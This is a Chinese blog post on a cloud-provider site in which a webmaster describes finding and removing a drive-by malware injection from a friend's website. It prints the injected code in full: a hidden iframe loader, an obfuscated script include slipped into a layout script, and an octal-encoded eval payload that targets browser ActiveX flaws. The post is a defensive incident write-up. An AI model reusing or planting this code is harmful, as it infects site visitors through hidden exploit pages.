首頁 > 建站 > 伺服器

淺談站長如何排除網站掛馬

來源:互聯網
上載者:User
關鍵字 安全
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!

仲介交易 HTTP://www.aliyun.com/zixun/aggregation/6858.html">SEO診斷 淘寶客 雲主機 技術大廳

昨晚深邃網友一諾小朋友向我報告說友情連結有一個網站有木馬,我一看,暈,那個不是我正在幫朋友做關

鍵詞優化的QQ個性簽名麼?一開始以為只是殺軟誤報,加上我也沒有裝殺毒軟體(一直沒中過病毒),所以就沒怎麼管他?

今天起來用新手機((*^__^*) 嘻嘻......,俺買了黑莓8100)打開百度搜索一下QQ個性簽名,暈,排名不知道掉到第幾頁了。 我就鬱悶了,自己的SEO優化一直都是很溫柔的上的啊,怎麼會被降權了?於是就猜想可能真的被掛馬了,因為是也算是剛認識的朋友,當然要幫忙處理一下這些瑣碎的問題啦。 回來之後,馬上啟用德國殺軟小紅傘,「滴滴」兩聲,打開QQ個性簽名的時候報警了。 於是打開html代碼查看,既然沒有iframe,這就奇怪了。 於是清理緩存再次打開網頁,根據小紅傘提供的資料找到了報警的檔:info[1].js,打開得到下面的代碼:

var az=document.cookie;
var za=az.indexOf(」qqqq」);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=」qqqq=web;expires=」+expires.toGMTString();
document.writeln(」<iframe src=HTTP:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0><\/iframe>」); window.status=」 「;}

我想問題應該出在js代碼上,於是在代碼搜索js,一個是51la的統計的js,另外一個是div.js,51la的自然可以排除,所以我就打開div.js,然後看到了下面「此地無銀三百兩」的網址代碼(紅色字體的),一路跟蹤下去 ,果然發現可疑跡象。


// JavaScript Document
function showdiv(divnum,divbefor,id){
    for(i=1;i<=divnum;i++) {
        try{
             if(i==divbefor){
                 document.getElementById(id+i).style.display=」inline」;
            }else{
                 document.getElementById(id+i).style.display=」none」 ;
            }
        }catch(e){ }
    }
}
function menuFix(){}
document.writeln(」<script src=HTTP:\/\/%78%69%73%68%69%79%69%2E%63%6F%6D\/images\/main\/info.js><\ /script>」);

跟蹤代碼:HTTP:\/\/%78%69%73%68%69%79%69%2E%63%6F%6D\/images\/main\/info.js
firefox直接輸入,轉換得到位址如下HTTP://www.91q.org/templets/images/div.js打開代碼如下:

var az=document.cookie;
var za=az.indexOf(」qqqq」);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=」qqqq=web;expires=」+expires.toGMTString();
document.writeln(」<iframe src=HTTP:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0><\/iframe>」); window.status=」 「;}

繼續iframe跟蹤:HTTP://kkwwkkc.cn/10/zz.htm
打開代碼如下:

<iframe src=123.htm width=100 height=0></iframe>
<script language=」javascript」 type=」text/javascript」 src=」HTTP://js.users.51.la/2191926.js」></script>
<noscript><a href=」HTTP://www.51.la/?2191926″ target=」_blank」><img alt=」&#x6211;&#x8981; &#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;」 src=」HTTP://img.users.51.la/2191926.asp」 style=」 border:none」 /></a></noscript>

繼續iframe跟蹤:HTTP://kkwwkkc.cn/10/123.htm
打開得到如下王八代碼:

&lt;script&gt;


eval(」\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\ 164\150\75\62\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\146\154\141\163\150\56\150\164\155\76\74\ 57\151\146\162\141\155\145\76\42\51\73\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\ 151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\ 141\163\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\167\151\156\144\157\167\56\163\164\ 141\164\165\163\75\42\55614\61020\42\73\15\12\167\151\156\144\157\167\56\157\156\145\162\162\157\162\75\146\ 165\156\143\164\151\157\156\50\51\173\162\145\164\165\162\156\40\164\162\165\145\73\175\15\12\151\146\50\156\ 141\166\151\147\141\164\157\162\56\165\163\145\162\101\147\145\156\164\56\164\157\114\157\167\145\162\103\141\ 163\145\50\51\56\151\156\144\145\170\117\146\50\42\155\163\151\145\40\67\42\51\75\75\55\61\51\15\12\144\157\ 143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\62\60\40\150\145\151\ 147\150\164\75\60\40\163\162\143\75\61\64\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\ 164\162\171\173\166\141\162\40\146\73\15\12\166\141\162\40\147\147\75\156\145\167\40\101\143\164\151\166\145\ 130\117\142\152\145\143\164\50\42\107\114\111\105\104\157\167\156\56\111\105\104\157\167\156\56\61\42\51\73\ 175\15\12\143\141\164\143\150\50\146\51\173\175\73\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40 \40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\146\41\75\42\133\157\142\152\145\143\164\40\105\162\ 162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\ 145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\154\172\56\150\164\ 155\76\74\57\151\146\162\141\155\145\76\42\51\73\175\175\15\12\164\162\171\173\166\141\162\40\155\73\15\12\166 \141\162\40\150\150\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\104\157\167\156\154\157\141\144\ 145\162\56\104\114\157\141\144\145\162\56\61\42\51\73\175\15\12\143\141\164\143\150\50\155\51\173\175\73\40\40 \40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\ 155\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\ 56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\ 150\164\75\60\40\163\162\143\75\163\151\156\141\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\ 175\175\15\12\164\162\171\173\166\141\162\40\156\73\15\12\166\141\162\40\154\154\75\156\145\167\40\101\143\164 \151\166\145\130\117\142\152\145\143\164\50\42\163\156\160\166\167\56\123\156\141\160\163\150\157\164\40\126\ 151\145\167\145\162\40\103\157\156\164\162\157\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\156\51\173\ 175\73\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\ 156\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\ 56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\ 150\164\75\60\40\163\162\143\75\157\146\146\151\143\145\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\ 51\73\175\175\15\12\164\162\171\173\166\141\162\40\142\73\15\12\166\141\162\40\155\155\75\156\145\167\40\101\ 143\164\151\166\145\130\117\142\152\145\143\164\50\42\116\103\124\101\165\144\151\157\106\151\154\145\62\56\ 101\165\144\151\157\106\151\154\145\62\56\62\42\51\73\175\15\12\143\141\164\143\150\50\142\51\173\175\73\40\40 \40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\ 142\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\ 56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\ 40\163\162\143\75\116\103\124\101\165\144\151\157\106\151\154\145\56\150\164\155\76\74\57\151\146\162\141\155\ 145\76\42\51\73\175\175\15\12\146\165\156\143\164\151\157\156\40\164\145\163\164\50\51\15\12\173\15\12\162\162 \157\157\170\170\40\75\40\42\111\105\122\42\40\53\40\42\120\103\164\154\56\111\42\40\53\40\42\105\122\120\42\ 40\53\40\42\103\164\154\56\61\42\73\15\12\164\162\171\15\12\173\15\12\114\151\153\145\40\75\40\156\145\167\40\ 101\143\164\151\166\145\130\117\142\152\145\143\164\50\162\162\157\157\170\170\51\73\15\12\175\143\141\164\143 \150\50\145\162\162\157\162\51\173\162\145\164\165\162\156\73\175\15\12\166\166\166\166\166\40\75\40\114\151\ 153\145\56\120\154\141\171\145\162\120\162\157\160\145\162\164\171\50\42\120\122\117\104\125\103\124\126\105\ 122\123\111\117\116\42\51\73\15\12\151\146\50\166\166\166\166\166\74\75\42\66\56\60\56\61\64\56\65\65\62\42\51 \15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\ 60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\162\145\61\60\56\150\164\155\76\74\57\151\146\162\141 \155\145\76\42\51\73\15\12\145\154\163\145\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\ 74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\ 75\162\145\61\61\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\175\15\12\164\145\163\164\ 50\51\73″)


&lt;/script&gt;

鄙人才疏學淺,看不懂轉化了的代碼啥意思,不想去轉換,知道被掛馬就ok了,最後是跟朋友說讓他去掉那個代碼,清理緩存重新打開網頁,ok,沒問題了。

寫這篇文章的用意在意告訴各位,要注意自己網站的安全,如果發現掛馬,不要錯過每一個細節,首先仔細檢查html頁面有沒有調用其他莫名的網站的東西,然後仔細分析自己頁面的js代碼,iframe是駭客們最常用的手段。 實例一篇,希望對各位有用。 這是我第一次抓馬,經過自己的分析既然抓到了,很開心,特此分享......

本文由HTTP://www.91q.org站長供稿。 版權聲明:本站作品採用知識共用"署名2.5中國大陸"授權合約進行授權,轉載必須注明深邃技術及原文位址。

原文位址: HTTP://www.pcliver.cn/archives/279.html

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

相關文章
sql語句操作全集值得永久收藏
提高SQL執行效率的幾點建議
精妙的SQL語句技巧集合
3個步驟解決SQL注入隱患
SQL優化經驗總結34條
sql 統計本周,本月,下周,下月sql語句

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

熱門文章

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More